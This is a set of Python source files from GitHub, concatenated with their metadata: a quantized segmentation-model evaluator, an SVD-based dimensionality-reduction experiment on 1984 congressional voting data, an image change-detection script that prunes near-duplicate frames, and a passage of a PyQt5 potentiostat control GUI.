cv2.split(pred_image)\n pred_image = cv2.merge((R,G,B))\n cv2.imwrite(\"../rpt/quantized_\" + img_filename , orig_image)\n cv2.imwrite(\"../rpt/quantized_\" + seg_filename , gt_image )\n cv2.imwrite(\"../rpt/quantized\" + pred_filename , pred_image)\n '''\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--graph\", type=str,\n default=\"../quantized_results/quantize_eval_model.pb\",\n help=\"graph file (.pb) to be evaluated.\")\n parser.add_argument(\"--input_node\", type=str,\n default=\"input_1\",\n help=\"input node.\")\n parser.add_argument(\"--output_node\", type=str,\n default=\"conv2d_transpose_3/conv2d_transpose\",\n help=\"output node.\")\n parser.add_argument(\"--class_num\", type=int,\n default=cfg.NUM_CLASSES,\n help=\"number of classes.\")\n parser.add_argument(\"--gpu\", type=str,\n default=\"0\",\n help=\"gpu device id.\")\n FLAGS, unparsed = parser.parse_known_args()\n tf.compat.v1.app.run(main=main, argv=[sys.argv[0]] + unparsed)\n","repo_name":"Xilinx/Vitis-In-Depth-Tutorial","sub_path":"Machine_Learning/Design_Tutorials/05-Keras_FCN8_UNET_segmentation/files/code/eval_quantized_graph.py","file_name":"eval_quantized_graph.py","file_ext":"py","file_size_in_byte":5925,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"52"} +{"seq_id":"38882210946","text":"import torch\nimport torch.nn as nn\nimport pandas as pd\nfrom sklearn.neighbors import NearestNeighbors\nimport numpy as np\nimport time\nimport random\nfrom sklearn.cluster import DBSCAN\nfrom sklearn.metrics import v_measure_score\nstart_time = time.time()\ntorch.manual_seed(2)\nrandom.seed(2)\n\n\n# Hyper parameters\nnum_original_dim = 16 # number of dimensions in the original data\nlbda_svd = .000001 # scaling for the singular value decomposition factor .00000000000001\nlbda_var = .0045 # scaling for the 
variance factor .0045\n\nnum_lm = 100 # number of landmarks, must be a multiple of ten\nbatch_size = 100 # number of points in each batch\nnum_batches = 2 # number of batches to use\ntest_size = 60 # number of points to use for testing\nsize = num_lm + (batch_size * num_batches) # total number of points needed\n\nlr = .1 # learning rate .0001\nlinear_dim1 = 10 # dimension of the first hidden layer\nlinear_dim2 = 32 # dimension of the second hidden layer\nlinear_dim3 = 32 # dimension of the third hidden layer\nlinear_dim4 = 10 # dimension of the fourth hidden layer\nlinear_dim5 = num_original_dim # dimension of the final layer\nepoch = 5 # number of times to train the network\nset_random = False # if true, choose landmarks randomly\ntemp_subset = num_lm + (batch_size * 5) # total number of points to acquire\nfinal_dim = 0 # number of dimensions to reduce to at the end\n\nk_start = 3 # how you find landmarks based off of number of nearest neighbors\nk_lm = 5 # number of landmarks each landmark has\nk_other = 10 # number of landmarks each regular points has\n\nm, n = size, 16 # number of samples, number of dimensions/parameters\n\n\ndef normalize(data):\n \"\"\"\n Function to normalize the data\n :param data: data to be normalized\n :return: normalized data\n \"\"\"\n row = np.size(data, 0) # number of data points\n col = np.size(data, 1) # dimensionality of data points\n for j in range(col):\n # find the average for each column\n col_sum = 0\n for i in range(row):\n col_sum = col_sum + data[i][j]\n col_sum = col_sum / row\n # subtract the average from each value in the column\n for i in range(row):\n data[i][j] = data[i][j] - col_sum\n return data\n\n\ndef original_clean():\n \"\"\"\n Method to clean the data\n :return: data and labels\n \"\"\"\n dataset = pd.read_csv('Parliment-1984.csv')\n X = dataset.iloc[:, 1:].values\n y = dataset.iloc[:, 0].values\n\n for i in range(0, 434):\n if y[i] == 'democrat':\n y[i] = 0\n elif y[i] == 'republican':\n y[i] = 1\n y = y.astype(int)\n\n for a in range(0, 434):\n for b in range(0, 16):\n if 'y' in X[a][b]:\n X[a][b] = 1\n elif 'n' in X[a][b]:\n X[a][b] = 0\n\n medians = []\n for x in range(0, 16):\n acceptable = []\n for z in range(0, 434):\n if (X[z][x] == 1) or (X[z][x] == 0):\n acceptable.append(X[z][x])\n med = np.median(acceptable)\n medians.append(int(med))\n\n for c in range(0, 434):\n for d in range(0, 16):\n if (X[c][d] != 1) and (X[c][d] != 0):\n X[c][d] = medians[d]\n X = X.astype(float)\n X = normalize(X)\n return X, y\n\n\nclass Net(nn.Module):\n \"\"\"\n Neural network to train\n \"\"\"\n def __init__(self):\n super(Net, self).__init__()\n self.f = nn.Linear(num_original_dim, linear_dim1, bias=True)\n self.f2 = nn.Linear(linear_dim1, linear_dim2, bias=True)\n self.f3 = nn.Linear(linear_dim2, linear_dim3, bias=True)\n self.f4 = nn.Linear(linear_dim3, linear_dim4, bias=True)\n self.f5 = nn.Linear(linear_dim4, linear_dim5, bias=True)\n\n def encode(self, x):\n p = nn.LeakyReLU()\n x = p(self.f(x))\n x = p(self.f2(x))\n x = p(self.f3(x))\n x = p(self.f4(x))\n x = self.f5(x)\n return x\n\n def decode(self, x):\n \"\"\"\n Holder function to be used to return to the original data (like an auto-encoder)\n To be implemented in future work\n :param x: data\n :return: decoded data\n \"\"\"\n return x\n\n def forward(self, x, decode):\n x = self.encode(x)\n if decode:\n x = self.decode(x)\n return x\n\n\ndef load_data():\n \"\"\"\n Function to load the data\n :param size: total number of points to get\n :param num_lm: number of points which will be 
landmarks\n :return: the batch loader, landmark points, labels, batched data without landmark points,\n data organized in graphs, neighborhood graph for the landmarks, original data, original labels,\n neighborhood graphs for non-landmarks\n \"\"\"\n global batch_size, num_batches\n # import data\n data, labels = original_clean()\n test_data = data[:test_size, :]\n test_labels = labels[:test_size]\n\n data = data[test_size:, :]\n\n # make landmarks with points with most neighbors\n N = NearestNeighbors(n_neighbors=k_start).fit(data).kneighbors_graph(data).todense()\n N = np.array(N)\n num_connections = N.sum(axis=0).argsort()[::-1] # see how many neighbors each point has\n top_landmarks_idxs = num_connections[:num_lm] # sort in descending order\n land_marks = data[top_landmarks_idxs, :] # pick the top ones\n data = np.delete(data, top_landmarks_idxs, axis=0) # delete the landmarks\n # find the nearest landmarks for the landmarks\n landmark_neighbors = NearestNeighbors(n_neighbors=k_lm).fit(land_marks).kneighbors_graph(land_marks).todense()\n # break data into batches, create empty holders\n batch_loader = np.zeros((num_batches, batch_size + num_lm, n))\n batch_graph = np.zeros((num_batches, batch_size + num_lm, batch_size + num_lm))\n # create the full neighborhood graph for each batch\n for i in range(num_batches):\n holder = data[batch_size * i: batch_size * (i + 1)]\n # find the nearest landmarks for the rest of the points\n holder_graph = NearestNeighbors(n_neighbors=k_other).fit(land_marks).kneighbors_graph(holder).todense()\n for j in range(batch_size): # copy over the holder graph\n for l in range(num_lm):\n if holder_graph[j, l] == 1:\n batch_graph[i, j, l + batch_size] = 1\n batch_graph[i, l + batch_size, j] = 1\n for j in range(num_lm): # copy over landmark neighbors\n for l in range(j, num_lm):\n if landmark_neighbors[j, l] == 1 and j != l:\n batch_graph[i, j + batch_size, l + batch_size] = 1\n batch_graph[i, l + batch_size, j + batch_size] = 1\n holder = np.concatenate((holder, land_marks))\n batch_loader[i] = holder\n batch_size += num_lm # adjust the batch size\n return batch_loader, data, batch_graph, landmark_neighbors, test_data, test_labels, land_marks\n\n\ndef train_net(epoch, data, net, opti, batch_graph):\n \"\"\"\n Function to train the network\n :param epoch: number of times to train\n :param data: data to train with\n :param net: neural network to train\n :param opti: optimizer to use during training\n :return:\n \"\"\"\n global num_batches, batch_size\n # train the network\n for num in range(epoch):\n # run each batch through each round\n for batch_id in range(num_batches):\n # calculate the neighborhood for the graph\n batch = torch.from_numpy(data[batch_id]).float()\n batch = batch.view(batch_size, -1)\n batch_distances = pairwise_distances(batch)\n nbr_graph_tensor = torch.from_numpy(batch_graph[batch_id]).float()\n batch_distances_masked = batch_distances * nbr_graph_tensor.float()\n global lbda\n out = net(batch, False) # run the batch through the network\n svd_loss, out = implement_svd(out) # calculate the SVD L2,1 loss and SVD representation\n output_distances = pairwise_distances(out)\n # Multiply the distances between each pair of points with the neighbor mask\n output_distances_masked = output_distances * nbr_graph_tensor.float()\n # Find the difference between |img_i - img_j|^2 and |output_i - output_j|^2\n nbr_diff = torch.abs((output_distances_masked - batch_distances_masked))\n nbr_distance = nbr_diff.norm()\n svd_loss *= lbda_svd # multiply SVD loss 
by its scaling factor\n            # find variance in all directions\n            var = 0\n            for i in range(out.size()[0]):\n                var += lbda_var / out[i].var()\n            loss = nbr_distance + svd_loss + var  # loss contains all three terms\n            opti.zero_grad()\n            loss.backward()\n            opti.step()\n            print('Epoch: %f, Step: %f, Loss: %.2f' % (num, batch_id + 1, loss.data.cpu().numpy()))\n\n    # find the ideal number of dimensions\n    global final_dim\n    batch = torch.from_numpy(data[0]).float()\n    batch = batch.view(batch_size, -1)\n    out = net(batch, False)\n    u, s, v = torch.svd(out)\n    final_dim = calc_dim(s)\n\n\ndef train_lms(epoch, land_marks, net, opti, landmark_neighbors):\n    \"\"\"\n    Function to train the landmarks to spread them out\n    :param epoch: number of times to train the network\n    :param land_marks: points to use for distance calculations\n    :param net: neural network to train\n    :param opti: optimizer to use for the network\n    :param landmark_neighbors: nearest neighbors of the landmarks\n    :return:\n    \"\"\"\n    # find the neighborhood graphs for the landmarks\n    batch = torch.from_numpy(land_marks).float().view(num_lm, -1)\n    batch_distances = pairwise_distances(batch)\n    neighbor_graph = torch.from_numpy(landmark_neighbors).float()\n    batch_distances_masked = batch_distances * neighbor_graph.float()\n    # train the network\n    for num in range(epoch):\n        global lbda\n        print(batch.shape)\n        out = net(batch, False)  # put the data through the network\n        svd_loss, out = implement_svd(out)  # find SVD translation and L2,1 regularization\n        output_distances = pairwise_distances(out)\n        # Multiply the distances between each pair of points with the neighbor mask\n        output_distances_masked = output_distances * neighbor_graph.float()\n        # Find the difference between |img_i - img_j|^2 and |output_i - output_j|^2\n        nbr_diff = torch.abs((output_distances_masked - batch_distances_masked))\n        nbr_distance = nbr_diff.norm()\n        svd_loss *= lbda_svd  # multiply SVD term by its scaling factor\n        # calculate variance in all directions\n        var = 0\n        for i in range(out.size()[0]):\n            var += lbda_var / out[i].var()\n        loss = nbr_distance + svd_loss + var  # loss includes all three terms\n        opti.zero_grad()\n        loss.backward()\n        opti.step()\n        print('Epoch [{}/{}], Loss: {:.4f}'.format(num + 1, epoch, loss.item()))\n\n\ndef pairwise_distances(x):\n    '''\n    TODO cite this\n    Input: x is a Nxd matrix\n           y is an optional Mxd matrix\n    Output: dist is a NxM matrix where dist[i,j] is the square norm between x[i,:] and y[j,:]\n            if y is not given then use 'y=x'.\n            i.e. 
dist[i,j] = ||x[i,:]-y[j,:]||^2\n    '''\n    x_norm = (x ** 2).sum(1).view(-1, 1)  # square every element, sum, resize to list\n    y = torch.transpose(x, 0, 1)\n    y_norm = x_norm.view(1, -1)\n\n    dist = x_norm + y_norm - 2.0 * torch.mm(x, y)\n    return torch.clamp(dist, 0.0, np.inf)\n\n\ndef implement_svd(data):\n    \"\"\"\n    Function to implement svd on the data and find the L2,1 regularization term\n    :param data: data to be reduced with SVD\n    :return: L2,1 regularization term and transformed matrix\n    \"\"\"\n    u, s, v = torch.svd(data)  # implement svd\n    # note: the u returned by this function only includes the top values.\n    # u * s will be equivalent due to the zero terms, but will run more efficiently with this implementation.\n    s = torch.diag(s)  # turn s into a diagonal matrix\n    transformed_matrix = torch.mm(u, s)  # u * s\n    return l21_reg(s), transformed_matrix  # return the L2,1 regularization term and matrix\n\n\ndef l21_reg(data):\n    \"\"\"\n    Function to find the L2,1 regularization term\n    :param data: matrix to find the L2,1 regularization term of\n    :return: L2,1 regularization term\n    \"\"\"\n    m = data.size()[0]  # number of data points\n    n = data.size()[1]  # number of dimensions on the data points\n    # find L2,1 regularization term\n    outer_sum = 0\n    for i in range(m):\n        inner_sum = 0\n        for j in range(n):\n            inner_sum += data[i][j] ** 2\n        outer_sum += inner_sum ** 0.5\n    return outer_sum\n\n\ndef evaluate(test_dataset, test_labels, net):\n    \"\"\"\n    Function to evaluate the accuracy of the model\n    :param test_dataset: test data\n    :param test_labels: labels for the test data\n    :param net: pre-trained network\n    :return: accuracy score\n    \"\"\"\n    rep = torch.zeros((test_dataset.shape[0], final_dim))\n    # find each lower dimensional representation\n    d = torch.from_numpy(test_dataset)\n    net = net.double()\n    out = net(d, False)  # put through the network\n    u, s, v = torch.svd(out)  # implement SVD\n    top_vals = torch.diag(s)  # create the diagonal matrix from s\n    top_vals = top_vals[:, :final_dim]  # cut down s with SVD\n    rep = torch.mm(u, top_vals)\n    # evaluate the accuracy of the representation\n    rep = rep.detach().numpy()\n    model = DBSCAN()\n    predicted = model.fit_predict(rep)\n    score = v_measure_score(predicted, test_labels)\n    return rep, score\n\n\ndef calc_dim(s):\n    \"\"\"\n    Function to calculate the number of dimensions which would equal 90% of the data information\n    :param s: S vector from SVD\n    :return: suggested number of dimensions to use\n    \"\"\"\n    s = s.detach().numpy()\n    dim = 0\n    # calculate how much 90% would be\n    s_square = [i ** 2 for i in s]\n    sum_square = sum(s_square)\n    goal = .9 * sum_square\n    # find 90%\n    count = 0\n    while count < goal:\n        count += s_square[dim]\n        dim += 1\n    return dim  # return this many dimensions\n\n\ndef run():\n    global num_lm\n    # load the data\n    data_loader, data, batch_graph, landmark_neighbors, test_dataset, test_labels, land_marks = load_data()\n    # create the network and initialize the weights\n    net = Net()\n    opti = torch.optim.Adam(net.parameters(), lr=lr, weight_decay=1e-3)\n    train_lms(epoch, land_marks, net, opti, landmark_neighbors)  # train the landmarks only first\n    train_net(epoch, data_loader, net, opti, batch_graph)  # train all other points to fit around the landmarks\n    # evaluate on the held-out test data\n    return evaluate(test_dataset, test_labels, net)  # evaluate model accuracy\n\n\nrep, score = 
run()\nprint(score)\n","repo_name":"jabader97/DeepMaximumVarianceUnfolding","sub_path":"SVDMVU/SVDMVU_CongressionalVotingRecords.py","file_name":"SVDMVU_CongressionalVotingRecords.py","file_ext":"py","file_size_in_byte":14746,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"34761776550","text":"import glob\nimport os\nimport argparse\n\n\nimport cv2\nimport imutils\n\nparser = argparse.ArgumentParser(description='Dataset optimisation')\nparser.add_argument('--path', help='path to dataset')\nparser.add_argument('--min_len_cont',default=0, help='minimum length of contours that is checked for very similar images')\nparser.add_argument('--min_prob',default=0, help='minimum probability that is checked for very similar images')\nparser.add_argument('--minor_cont',default=10, help='no of contours checked for very minor changes')\nparser.add_argument('--minor_prob',default=0.02, help='minimum probability that is checked for very minor changes')\nparser.add_argument('--person_cont',default=2, help='no of contours checked for the presence of a human or similar')\nparser.add_argument('--person_prob',default=1, help='minimum probability that is checked for presence of a human or similar')\nparser.add_argument('--infront_cont',default=3, help='no of contours checked if something comes in front of the camera')\nparser.add_argument('--infront_prob',default=30, help='minimum probability that is checked if something comes in front of the camera')\nparser.add_argument('--car_cont',default=10, help='no of contours checked if a car comes in or leaves')\nparser.add_argument('--car_prob',default=10, help='minimum probability that is checked if a car comes in or leaves')\nparser.add_argument('--climatic_cont',default=15, help='no of contours checked due to changes in climatic conditions')\nparser.add_argument('--climatic_prob',default=25, help='minimum probability that is checked due to changes in climatic conditions')\n\n\ndef draw_color_mask(img, borders, color=(0, 0, 0)):\n    h = img.shape[0]\n    w = img.shape[1]\n\n    x_min = int(borders[0] * w / 100)\n    x_max = w - int(borders[2] * w / 100)\n    y_min = int(borders[1] * h / 100)\n    y_max = h - int(borders[3] * h / 100)\n\n    img = cv2.rectangle(img, (0, 0), (x_min, h), color, -1)\n    img = cv2.rectangle(img, (0, 0), (w, y_min), color, -1)\n    img = cv2.rectangle(img, (x_max, 0), (w, h), color, -1)\n    img = cv2.rectangle(img, (0, y_max), (w, h), color, -1)\n\n    return img\n\n\ndef preprocess_image_change_detection(img, gaussian_blur_radius_list=None, black_mask=(5, 10, 5, 0)):\n    gray = img.copy()\n    gray = cv2.cvtColor(gray, cv2.COLOR_BGR2GRAY)\n    if gaussian_blur_radius_list is not None:\n        for radius in gaussian_blur_radius_list:\n            gray = cv2.GaussianBlur(gray, (radius, radius), 0)\n\n    gray = draw_color_mask(gray, black_mask)\n\n    return gray\n\n\ndef compare_frames_change_detection(prev_frame, next_frame, min_contour_area):\n    frame_delta = cv2.absdiff(prev_frame, next_frame)\n    thresh = cv2.threshold(frame_delta, 45, 255, cv2.THRESH_BINARY)[1]\n\n    thresh = cv2.dilate(thresh, None, iterations=2)\n    cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL,\n                            cv2.CHAIN_APPROX_SIMPLE)\n    cnts = imutils.grab_contours(cnts)\n\n    score = 0\n    res_cnts = []\n    for c in cnts:\n        if cv2.contourArea(c) < min_contour_area:\n            continue\n\n        res_cnts.append(c)\n        score += cv2.contourArea(c)\n\n    return score, res_cnts, thresh\n\n\ndef main():\n    args = parser.parse_args()\n\n    if args.path is None:\n        print('Enter path to directory')\n        exit()\n\n    
image_names = {}\n    for index, name in enumerate(sorted(glob.glob(args.path + '/*'))):\n        image_names[index] = {'image_name': name, 'compare_status': None}\n\n    no_changes = 0\n    climatic_changes = 0\n    minor_sunlight_changes = 0\n    car_changes = 0\n    infront_camera = 0\n    people_changes = 0\n\n    for key, values in image_names.items():\n        print(f'Looping over images {key}')\n        next_frame_index = key + 1\n        if next_frame_index in image_names.keys():\n            try:\n                next_frame_img = image_names[next_frame_index]['image_name']\n            except:\n                pass\n\n        image_1 = cv2.imread(values['image_name'])\n        height, width = image_1.shape[0], image_1.shape[1]\n        area_image = height * width\n        preprocess_1 = preprocess_image_change_detection(image_1, gaussian_blur_radius_list=[3, 5])\n\n        image_2 = cv2.imread(next_frame_img)\n        preprocess_2 = preprocess_image_change_detection(image_2, gaussian_blur_radius_list=[3, 5])\n\n        score, res_cnts, thresh = compare_frames_change_detection(preprocess_1, preprocess_2, min_contour_area=450)\n\n        thresh = cv2.dilate(thresh, None, iterations=2)\n        cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n        cnts = imutils.grab_contours(cnts)\n\n        len_cnts = len(cnts)\n        len_res_cnts = len(res_cnts)\n        probability_change = score / area_image\n\n        if len_res_cnts == args.min_len_cont or probability_change == args.min_prob:\n            # This condition checks whether there are no observable changes between two frames\n            values['compare_status'] = True\n            no_changes += 1\n\n        elif len_cnts >= args.minor_cont and probability_change >= args.minor_prob:\n            # This condition checks whether there are some minor changes, mostly changes in daylight\n            values['compare_status'] = True\n            minor_sunlight_changes += 1\n\n        elif len_res_cnts < args.person_cont and probability_change < args.person_prob:\n            # This condition checks whether there are any changes due to presence of humans or anything similar\n            values['compare_status'] = False\n            people_changes += 1\n\n        elif len_res_cnts <= args.infront_cont and probability_change <= args.infront_prob:\n            # This condition checks for presence of something right in front of the camera\n            values['compare_status'] = False\n            infront_camera += 1\n\n        elif len_res_cnts < args.car_cont and probability_change <= args.car_prob:\n            # This condition checks if there are changes due to presence or absence of cars from the scene\n            values['compare_status'] = False\n            car_changes += 1\n\n        elif len_res_cnts >= args.climatic_cont or probability_change >= args.climatic_prob:\n            # This condition checks for changes that occur because of major climatic changes\n            values['compare_status'] = True\n            climatic_changes += 1\n        else:\n            # This condition catches all other changes and does not change the status to True, so as not to miss out on crucial information\n            values['compare_status'] = False\n\n\n        if values['compare_status'] == True:\n            os.remove(values['image_name'])\n\n    count = 0\n    for keys, values in image_names.items():\n        if values['compare_status'] == True:\n            count += 1\n\n\n    print(f'Discarded images because of no observable changes {no_changes}')\n    print(f'Discarded images because of climatic changes {climatic_changes}')\n    print(f'Discarded images because of minor sunlight changes {minor_sunlight_changes}')\n    print(f'Changes due to vehicle movements {car_changes}')\n    print(f'Changes due to movements in front of the camera {infront_camera}')\n    print(f'Changes due to movements of people {people_changes}')\n    print(f'Deleted images = {count}')\n    print(f'Percentage of deleted images = {count / len(image_names) * 
100}')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hamza9305/Kopernikus_task","sub_path":"imaging_interview.py","file_name":"imaging_interview.py","file_ext":"py","file_size_in_byte":7329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43711199324","text":"#!/usr/bin/env python\r\n\r\n\r\n#############################################################################\r\n##\r\n## Copyright (C) 2013 Riverbank Computing Limited.\r\n## Copyright (C) 2010 Nokia Corporation and/or its subsidiary(-ies).\r\n## All rights reserved.\r\n##\r\n## This file is part of the examples of PyQt.\r\n##\r\n## $QT_BEGIN_LICENSE:BSD$\r\n## You may use this file under the terms of the BSD license as follows:\r\n##\r\n## \"Redistribution and use in source and binary forms, with or without\r\n## modification, are permitted provided that the following conditions are\r\n## met:\r\n## * Redistributions of source code must retain the above copyright\r\n## notice, this list of conditions and the following disclaimer.\r\n## * Redistributions in binary form must reproduce the above copyright\r\n## notice, this list of conditions and the following disclaimer in\r\n## the documentation and/or other materials provided with the\r\n## distribution.\r\n## * Neither the name of Nokia Corporation and its Subsidiary(-ies) nor\r\n## the names of its contributors may be used to endorse or promote\r\n## products derived from this software without specific prior written\r\n## permission.\r\n##\r\n## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\r\n## \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\r\n## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\r\n## A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT\r\n## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\r\n## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\r\n## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\r\n## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\r\n## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\r\n## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\r\n## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\"\r\n## $QT_END_LICENSE$\r\n##\r\n#############################################################################\r\n\r\n\r\nfrom PyQt5.QtCore import QDateTime, Qt, QTimer\r\nfrom PyQt5.QtWidgets import (QApplication, QCheckBox, QComboBox, QDateTimeEdit,\r\n        QDial, QDialog, QGridLayout, QGroupBox, QHBoxLayout, QLabel, QLineEdit,\r\n        QProgressBar, QPushButton, QRadioButton, QScrollBar, QSizePolicy,\r\n        QSlider, QSpinBox, QStyleFactory, QTableWidget, QTabWidget, QTextEdit,\r\n        QVBoxLayout, QWidget)\r\nfrom pyqtgraph import PlotWidget, plot\r\nimport pyqtgraph as pg\r\nimport serial\r\n\r\n\r\nclass WidgetGallery(QDialog):\r\n    def __init__(self, parent=None):\r\n        super(WidgetGallery, self).__init__(parent)\r\n\r\n        self.originalPalette = QApplication.palette() \r\n\r\n        self.useStylePaletteCheckBox = QCheckBox(\"&Use style's standard palette\")\r\n        self.useStylePaletteCheckBox.setChecked(True)\r\n\r\n        disableWidgetsCheckBox = QCheckBox(\"&Disable widgets\")\r\n\r\n        self.createTopLeftGroupBox()\r\n        self.createTopRightGroupBox()\r\n        self.createProgressBar()\r\n\r\n        self.useStylePaletteCheckBox.toggled.connect(self.changePalette)\r\n        disableWidgetsCheckBox.toggled.connect(self.topLeftGroupBox.setDisabled)\r\n        disableWidgetsCheckBox.toggled.connect(self.topRightGroupBox.setDisabled)\r\n\r\n        topLayout = QHBoxLayout()\r\n        topLayout.addStretch(1)\r\n\r\n        mainLayout = QGridLayout()\r\n        mainLayout.addLayout(topLayout, 0, 0, 1, 2)\r\n        mainLayout.addWidget(self.topLeftGroupBox, 1, 0)\r\n        mainLayout.addWidget(self.topRightGroupBox, 1, 1)\r\n        mainLayout.addWidget(self.progressBar, 2, 0, 1, 2)\r\n        mainLayout.setRowStretch(1, 1)\r\n        mainLayout.setRowStretch(2, 4)\r\n        mainLayout.setColumnStretch(0, 1)\r\n        mainLayout.setColumnStretch(1, 5)\r\n        self.setLayout(mainLayout)\r\n\r\n        self.setWindowTitle(\"Potentiostat Application\")\r\n        self.changeStyle('Fusion')\r\n\r\n    def changeStyle(self, styleName):\r\n        QApplication.setStyle(QStyleFactory.create(styleName))\r\n        self.changePalette()\r\n\r\n    def changePalette(self):\r\n        if (self.useStylePaletteCheckBox.isChecked()):\r\n            QApplication.setPalette(QApplication.style().standardPalette())\r\n        else:\r\n            QApplication.setPalette(self.originalPalette)\r\n\r\n    def advanceProgressBar(self):\r\n        curVal = self.progressBar.value()\r\n        maxVal = self.progressBar.maximum()\r\n        self.progressBar.setValue(curVal + (maxVal - curVal) // 100)\r\n\r\n    def createTopLeftGroupBox(self):\r\n        self.topLeftGroupBox = QGroupBox(\"Insert Measurement Parameters:\")\r\n\r\n        # Select Measurement Method\r\n        self.styleComboBox = QComboBox()\r\n        methods = [\"CV\", \"DPV\", \"EIS\"]\r\n        self.styleComboBox.addItems(methods)\r\n        self.styleComboBox.setCurrentText(\"CV\")\r\n\r\n        self.styleLabel = QLabel(\"&Select measurement method:\")\r\n        self.styleLabel.setBuddy(self.styleComboBox)\r\n\r\n        # Store the selected measurement method\r\n        chosenMethod = self.styleComboBox.currentText()\r\n\r\n        # Labels\r\n        self.NbCycleLabel = QLabel(self)\r\n        self.NbCycleLabel.setText(\"Number of cycles\")\r\n        self.VminLabel = QLabel(self)\r\n        self.VminLabel.setText(\"Vmin (V)\")\r\n        self.VmaxLabel = QLabel(self)\r\n        self.VmaxLabel.setText(\"Vmax (V)\")\r\n        self.SRLabel = QLabel(self)\r\n        self.SRLabel.setText(\"Scan rate (V/s)\")\r\n        self.FminLabel = QLabel(self)\r\n        self.FminLabel.setText(\"Min freq (Hz)\")\r\n        self.FmaxLabel = QLabel(self)\r\n        self.FmaxLabel.setText(\"Max freq (Hz)\")\r\n        self.PWLabel = QLabel(self)\r\n        self.PWLabel.setText(\"Pulse width (ms)\")\r\n        self.CurrRangeLabel = QLabel(self)\r\n        self.CurrRangeLabel.setText(\"Curr range (uA)\")\r\n\r\n        # Text Fields\r\n        self.NbCycle = QLineEdit(self)\r\n        self.Vmin = QLineEdit(self)\r\n        self.Vmax = QLineEdit(self)\r\n        self.ScanRate = QLineEdit(self)\r\n        self.Fmin = QLineEdit(self)\r\n        self.Fmax = QLineEdit(self)\r\n        self.PW = QLineEdit(self)\r\n        self.CurrRange = QLineEdit(self)\r\n\r\n        # Initialise serial communication\r\n        esp_serial = serial.Serial('COM3', 115200, bytesize=serial.EIGHTBITS, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, timeout=None)\r\n\r\n        # Send the parameters over serial first. The attributes above are\r\n        # QLineEdit widgets, not numbers, so read their text and convert to\r\n        # float (empty fields fall back to 0) before formatting.\r\n        if esp_serial.is_open:\r\n            params = [float(field.text() or 0) for field in (self.NbCycle, self.Vmin, self.Vmax, self.ScanRate, self.Fmin, self.Fmax, self.PW, self.CurrRange)]\r\n            esp_serial.write((\"%.4f, %.4f, %.4f, %.4f, %.4f, %.4f, %.4f, %.4f\\r\\n\" % tuple(params)).encode(\"utf-8\"))\r\n\r\n        # Conditions\r\n        #self.styleComboBox.update()\r\n        #if chosenMethod == \"CV\":\r\n        #    self.Fmin.setEnabled(False)\r\n        #    self.Fmax.setEnabled(False)\r\n        #    self.PW.setEnabled(False)\r\n        #    self.CurrRange.setEnabled(False)\r\n        #if chosenMethod == \"DPV\":\r\n        #    self.NbCycle.setEnabled(False)\r\n        #    self.Fmin.setEnabled(False)\r\n        #    self.Fmax.setEnabled(False)\r\n        #    self.CurrRange.setEnabled(False)\r\n        #if chosenMethod == \"EIS\":\r\n        #    self.NbCycle.setEnabled(False)\r\n        #    self.Vmin.setEnabled(False)\r\n        #    self.Vmax.setEnabled(False)\r\n        #self.styleComboBox.update()\r\n\r\n        # Push Buttons\r\n        self.StartMeasurement = QPushButton(\"Start Measurement\")\r\n        self.StartMeasurement.setDefault(True)\r\n        self.StartMeasurement.move(20, 320)\r\n        self.StopMeasurement = QPushButton(\"Stop Measurement\")\r\n        self.StopMeasurement.setDefault(True)\r\n        self.StopMeasurement.move(20, 350)\r\n\r\n        # Notes field\r\n        self.textEdit = QTextEdit()\r\n        self.textEdit.setPlainText(\"Insert notes here\")\r\n\r\n        # Set positions in grid layout\r\n        layout = QGridLayout()\r\n        layout.addWidget(self.StartMeasurement,9,0)\r\n        layout.addWidget(self.StopMeasurement,9,1)\r\n        layout.addWidget(self.textEdit,10,0,10,2)\r\n        layout.addWidget(self.styleComboBox,0,1)\r\n        layout.addWidget(self.styleLabel,0,0)\r\n        layout.addWidget(self.NbCycle,1,1)\r\n        layout.addWidget(self.NbCycleLabel,1,0)\r\n        layout.addWidget(self.Vmin,2,1)\r\n        layout.addWidget(self.VminLabel,2,0)\r\n        layout.addWidget(self.Vmax,3,1)\r\n        layout.addWidget(self.VmaxLabel,3,0)\r\n        layout.addWidget(self.ScanRate,4,1)\r\n        layout.addWidget(self.SRLabel,4,0)\r\n        layout.addWidget(self.Fmin,5,1)\r\n        layout.addWidget(self.FminLabel,5,0)\r\n        layout.addWidget(self.Fmax,6,1)\r\n        layout.addWidget(self.FmaxLabel,6,0)\r\n        layout.addWidget(self.PW,7,1)\r\n        layout.addWidget(self.PWLabel,7,0)\r\n        layout.addWidget(self.CurrRange,8,1)\r\n        layout.addWidget(self.CurrRangeLabel,8,0)\r\n\r\n\r\n\r\n        # layout.addWidget(radioButton1)\r\n        # layout.addWidget(radioButton2)\r\n        # layout.addWidget(radioButton3)\r\n        # layout.addWidget(checkBox)\r\n        \r\n\r\n        #layout.addStretch()\r\n        